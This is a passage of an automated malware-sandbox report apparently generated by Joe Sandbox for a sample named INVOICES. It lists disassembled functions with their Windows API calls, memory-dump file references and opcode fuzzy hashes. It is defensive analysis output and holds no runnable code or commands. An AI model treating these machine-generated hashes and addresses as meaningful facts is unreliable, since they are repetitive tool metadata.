                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                  • Opcode ID: 4831a0399e50618cafa2fe92965bdaee8d38c6938db8267f24a142b8b0769206
                                                                                                                                  • Instruction ID: 4a5ca093df791bec09f03dbaae44d409aee52efcf90212c5e20e0554e62fd167
                                                                                                                                  • Opcode Fuzzy Hash: 4831a0399e50618cafa2fe92965bdaee8d38c6938db8267f24a142b8b0769206
                                                                                                                                  • Instruction Fuzzy Hash: 23E0ED3198522CBAEB206FA6DC0DFD77F6CEF26BA1F408125F909D5060C6799540CBA5
                                                                                                                                  Function 00732218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00732231
                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0073223B
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00732250
                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00732258
                                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 0076C003
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0076C010
                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0076C029
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0076C042
                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0076C062
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0076C06D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1946975507-0
                                                                                                                                  • Opcode ID: dd1abcdedd4906004ea9b7dcf5ebf4251159c5e6257613d2bc1667ddb13ad5a1
                                                                                                                                  • Instruction ID: e1c5ed34a5b3d19549155889586e020ea3619bb3df9435011b37cf8ecaa6f7c0
                                                                                                                                  • Opcode Fuzzy Hash: dd1abcdedd4906004ea9b7dcf5ebf4251159c5e6257613d2bc1667ddb13ad5a1
                                                                                                                                  • Instruction Fuzzy Hash: 9AE06D32100248EAEF215F78FC0DBD83B10EB05732F00C366FA6A980E187794A90DF11
                                                                                                                                  Function 00788A3A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00788A43
                                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,0078860E), ref: 00788A4A
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0078860E), ref: 00788A57
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,0078860E), ref: 00788A5E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3974789173-0
                                                                                                                                  • Opcode ID: de15035a647d4b61667a0096b7ece7cdaade3f6f926f7ca2655b4bf67292c4c7
                                                                                                                                  • Instruction ID: 63ce3442f33ecc8c1c15dbc034872402df879d654b2ca8c6740b3a590792cfdb
                                                                                                                                  • Opcode Fuzzy Hash: de15035a647d4b61667a0096b7ece7cdaade3f6f926f7ca2655b4bf67292c4c7
                                                                                                                                  • Instruction Fuzzy Hash: 5CE08636641211EFD760AFB06E0CF973BACEF54B92F04C928F245CA090DA3C9441C755
                                                                                                                                  Function 007720B6 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDesktopWindow.USER32 ref: 007720B6
                                                                                                                                  • GetDC.USER32(00000000), ref: 007720C0
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007720E0
                                                                                                                                  • ReleaseDC.USER32(?), ref: 00772101
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: f525ad107219b4f011404a44546df0a8648acbf7de41da853ec8e40894e7791c
                                                                                                                                  • Instruction ID: 7955ca16a63d4fb70820a0eeae7cf8e8b9a4fe33254951e4db41cd4cf59610e3
                                                                                                                                  • Opcode Fuzzy Hash: f525ad107219b4f011404a44546df0a8648acbf7de41da853ec8e40894e7791c
                                                                                                                                  • Instruction Fuzzy Hash: 4CE0C275800204EFDB01AF608C08BAD7BA1AB48750F10C125ED5AA6221CB7C8141DF45
                                                                                                                                  Function 007720CA Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDesktopWindow.USER32 ref: 007720CA
                                                                                                                                  • GetDC.USER32(00000000), ref: 007720D4
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007720E0
                                                                                                                                  • ReleaseDC.USER32(?), ref: 00772101
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: cad71a377052ae6484c983bb1bcbe50944940d3d64b83da9144fa006c7097afa
                                                                                                                                  • Instruction ID: b18544e6028986976f51a4cd868f706b13bc9bd4182bbe637000020b53bf703f
                                                                                                                                  • Opcode Fuzzy Hash: cad71a377052ae6484c983bb1bcbe50944940d3d64b83da9144fa006c7097afa
                                                                                                                                  • Instruction Fuzzy Hash: 59E0EEB5800208AFDB01AFA0CC08BAD7BA1AB4C714F10C129FD5AA7221CB7C91419F44
                                                                                                                                  Function 007363A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %|
                                                                                                                                  • API String ID: 0-1433500012
                                                                                                                                  • Opcode ID: b8ff6ac81491462bc1362891aff1d0ab6e172e303ab34bb3133dc30672ed449e
                                                                                                                                  • Instruction ID: 0a80e82262e460b91efc3a44be9916f87c31c39bec94bb32b9fdca06701cc502
                                                                                                                                  • Opcode Fuzzy Hash: b8ff6ac81491462bc1362891aff1d0ab6e172e303ab34bb3133dc30672ed449e
                                                                                                                                  • Instruction Fuzzy Hash: E1B1A275D00209EBEF24EF94C4959EDBBB4FF48310F508026E942A7197EB389E96CB51
                                                                                                                                  Function 0079B038 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0074FE06: _wcscpy.LIBCMT ref: 0074FE29
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • __wcsnicmp.LIBCMT ref: 0079B0B9
                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0079B182
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                  • String ID: LPT
                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                  • Opcode ID: 63a3eeb79939855d16aeb66823cd156423391292827eebb1ff85861dff331fa4
                                                                                                                                  • Instruction ID: 718818f9b5de4476e419747151e5ea346ba7254d50d7c63ebaf7e74017bc75fe
                                                                                                                                  • Opcode Fuzzy Hash: 63a3eeb79939855d16aeb66823cd156423391292827eebb1ff85861dff331fa4
                                                                                                                                  • Instruction Fuzzy Hash: 9661A371A00219EFCF14DF98E995EAEB7B4FF08310F004059F546AB291DB78AE40CB90
                                                                                                                                  Function 007788DA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID: Oat
                                                                                                                                  • API String ID: 4104443479-2936667180
                                                                                                                                  • Opcode ID: 698fa47c9feddf2b4c16b03dac44ac4c48d86bcf9370197afb74a77569866a2c
                                                                                                                                  • Instruction ID: 1be8649ed3bab613fae1c2dbfc38615ecd267047a0a32d646fe872d17e1619b3
                                                                                                                                  • Opcode Fuzzy Hash: 698fa47c9feddf2b4c16b03dac44ac4c48d86bcf9370197afb74a77569866a2c
                                                                                                                                  • Instruction Fuzzy Hash: FC514CB0E00609DFCF64CF68C884AAEB7B1FF44344F14856AE85AD7250EB39A955CB52
                                                                                                                                  Function 00742AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00742AC8
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00742AE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                  • Opcode ID: b309419b50ef54502f80ee56cdf72df444b90277e6597bf5803c7c7f3321a635
                                                                                                                                  • Instruction ID: e6aa6fd82599c37c49e76e1615d1ea8698e06a084cb97a209b0154b8cefd8af8
                                                                                                                                  • Opcode Fuzzy Hash: b309419b50ef54502f80ee56cdf72df444b90277e6597bf5803c7c7f3321a635
                                                                                                                                  • Instruction Fuzzy Hash: E8515971418748DBE320AF10DC89BAFB7F8FB84310F41895DF2D9510A2DB749529CB66
                                                                                                                                  Function 007997DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0073506B: __fread_nolock.LIBCMT ref: 00735089
                                                                                                                                  • _wcscmp.LIBCMT ref: 007998CD
                                                                                                                                  • _wcscmp.LIBCMT ref: 007998E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                                  • String ID: FILE
                                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                                  • Opcode ID: 819d331c1e828add5bd79db357fe79e543ecde84c137ac06fbbcc02760ee1a17
                                                                                                                                  • Instruction ID: 4bb2e7f51cb45bd4fd0f64294c44c47fbb65d813f5c0e80f50af1781cdf4ca4c
                                                                                                                                  • Opcode Fuzzy Hash: 819d331c1e828add5bd79db357fe79e543ecde84c137ac06fbbcc02760ee1a17
                                                                                                                                  • Instruction Fuzzy Hash: 5C41D971A0061AFAEF219EA4DC8AFEF77BDDF45710F00046DFA04B7181DA79A90587A1
                                                                                                                                  Function 007A26A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007A26B4
                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007A26EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                  • String ID: |
                                                                                                                                  • API String ID: 1413715105-2343686810
                                                                                                                                  • Opcode ID: 50252b81232c5d050d56f667e1a7b13d44ddefa0da5dfb3d624d8679815dbcad
                                                                                                                                  • Instruction ID: f9b31e653227eebe5930b60679d611ebe7c160b6e08a329d070adb49dd2d180d
                                                                                                                                  • Opcode Fuzzy Hash: 50252b81232c5d050d56f667e1a7b13d44ddefa0da5dfb3d624d8679815dbcad
                                                                                                                                  • Instruction Fuzzy Hash: AB313671800109EFDF55AFA4CC89EEEBFB9FF09314F100169F904A6166DA395A46DB60
                                                                                                                                  Function 007B6A95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 007B6B49
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007B6B85
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                  • String ID: static
                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                  • Opcode ID: 92528c0b5285f875f3a20bfa6fed4c840ecaaf210beb0463eae1722030a8f7fc
                                                                                                                                  • Instruction ID: 8c18a7a96c018601808f653ec9495db3fb9c33b1edf1145edbf4d5a8461c52aa
                                                                                                                                  • Opcode Fuzzy Hash: 92528c0b5285f875f3a20bfa6fed4c840ecaaf210beb0463eae1722030a8f7fc
                                                                                                                                  • Instruction Fuzzy Hash: 70317C71110604AAEB109F78CC95BFB73B9FF48724F108619FAA9D7190DB79AC81DB60
                                                                                                                                  Function 00792B9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00792C09
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00792C44
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                  • Opcode ID: 84a42a0543c95e61b85176481f1553a8e8bd8de1b90bb444bf4b6fa237ec4e10
                                                                                                                                  • Instruction ID: c1f7f44745a9428f0c678bee0fe24196a4b3572e8fedb32b781a176c68477fc1
                                                                                                                                  • Opcode Fuzzy Hash: 84a42a0543c95e61b85176481f1553a8e8bd8de1b90bb444bf4b6fa237ec4e10
                                                                                                                                  • Instruction Fuzzy Hash: 2931D931600209FFDF34AF54E985BAE7BB9EF06350F244019ED85961A2E7789A46CB60
                                                                                                                                  Function 007B6706 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007B6793
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007B679E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
